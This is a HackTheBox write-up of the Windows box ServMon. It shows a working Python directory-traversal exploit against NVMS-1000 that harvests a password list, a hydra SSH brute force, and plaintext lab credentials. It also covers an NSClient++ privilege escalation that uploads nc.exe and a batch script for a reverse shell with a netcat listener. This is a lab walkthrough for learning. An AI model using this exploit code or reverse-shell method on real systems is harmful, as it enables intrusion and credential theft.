ServMon Writeup — HackTheBox
Made by RebornSec ®
This is a Windows box by dmw0ng that requires enumerating every part of the machine: a vulnerability in NVMS-1000 gets us the user, and a script of our own run through NSClient++ gets us root. Enjoy!
Enumeration phase :
As usual, let's start with the nmap scan:
[~] nmap -sC -sV 10.10.10.184
Checking FTP (21) with an anonymous login, we find some good hints:
Nadine's directory contains a note telling us where the password file is located:
Nathan's directory gives us some notes about the updates that need to be handled:
Checking the login page (80), we notice that we can't get in with the usual default credentials or with SQL injection:
But we notice that this login page belongs to NVMS-1000 (a network video management system), so let's look for an exploit for it:
Let's check the first exploit, a directory traversal:
Using Burp Suite to exploit the vulnerability:
I found some credentials:
These passwords are found (stored in plaintext, not hashed):
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
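The traversal request sent through Burp above, as an added Python example (not the writeup's own code). It issues the raw path with http.client, which, unlike most HTTP client libraries, does not collapse the ../ segments before sending, and splits the returned file into one candidate password per line. The file location Users/Nathan/Desktop/Passwords.txt and the traversal depth are assumptions based on Nadine's note; the sample body is constructed from the list above.

```python
import http.client

TARGET = "10.10.10.184"   # box IP from the nmap scan
PORT = 80                 # NVMS-1000 web interface
# Assumed path: Nadine's FTP note says the password file is on Nathan's desktop.
TARGET_FILE = "Users/Nathan/Desktop/Passwords.txt"

# Constructed sample of what Passwords.txt returns (CRLF line endings, one password per line).
SAMPLE_BODY = (
    "1nsp3ctTh3Way2Mars!\r\n"
    "Th3r34r3To0M4nyTrait0r5!\r\n"
    "B3WithM30r4ga1n5tMe\r\n"
    "L1k3B1gBut7s@W0rk\r\n"
    "0nly7h3y0unGWi11F0l10w\r\n"
    "IfH3s4b0Utg0t0H1sH0me\r\n"
    "Gr4etN3w5w17hMySk1Pa5$\r\n"
)


def traversal_path(target_file, depth=12):
    """Build the raw request path: enough '../' to reach the drive root, then the file.
    Backslashes are normalised so a Windows-style path also works."""
    clean = target_file.replace("\\", "/").lstrip("/")
    return "/" + "../" * depth + clean


def parse_passwords(body):
    """One candidate per non-empty line; strips CR/LF and surrounding whitespace."""
    return [line.strip() for line in body.splitlines() if line.strip()]


def fetch_file(host, port, target_file, timeout=10):
    """Request the file through the traversal. http.client sends the path verbatim,
    so the '../' segments reach the server instead of being resolved client-side."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", traversal_path(target_file), headers={"User-Agent": "Mozilla/5.0"})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    if resp.status != 200:
        raise RuntimeError(f"traversal failed: HTTP {resp.status}")
    return body


def harvest(host=TARGET, port=PORT, target_file=TARGET_FILE, out="cryptedCreds.txt"):
    """Fetch the file and write the candidates to the wordlist later fed to hydra."""
    candidates = parse_passwords(fetch_file(host, port, target_file))
    with open(out, "w") as fh:
        fh.write("\n".join(candidates) + "\n")
    return candidates


if __name__ == "__main__":
    for pw in harvest():
        print(pw)
```

The resulting cryptedCreds.txt, together with a users.txt holding Nadine and Nathan, is what the hydra SSH run below consumes; if the server answers with something other than 200, check the depth first, since too few ../ segments leave you inside the web root.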
Let's try them out against our two users:
Nadine
Nathan
To do so I used hydra to check SSH logins using both files, users.txt and cryptedCreds.txt:
A new SSH login credential is found:
Nadine:L1k3B1gBut7s@W0rk
Let's log in as our user Nadine:
And we got our user.txt :)
Root phase :
On my way to finding root access I checked whether I could access the user Nathan:
Access is denied; I also checked whoami /all for some privileges:
Nothing looks suspicious. Digging through the files I found the monitoring agent NSClient++, whose configuration file exposes the host's admin password:
admin:ew2x6SsGTxjRwXOT
Using the NSClient++ documentation I figured out a way to get a shell:
Now let's check which port the NSClient++ service is listening on:
It seems to be running on port 8443; time to make our malicious script.
Let's upload our script.bat and nc.exe into the Temp directory first:
Firing up our Apache2 server and starting the upload:
Open another terminal and start listening:
[~] nc -nlvp 443
We add our script rebornsec.bat to the list of external scripts and execute it:
And we got a shell :
Congratulations, we got our root.txt:
A long road, but full of new things to learn :) Thanks again HackTheBox for this amazing box.